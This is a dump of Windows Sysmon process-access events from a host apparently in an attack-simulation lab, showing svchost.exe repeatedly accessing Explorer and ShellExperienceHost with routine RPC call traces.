08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 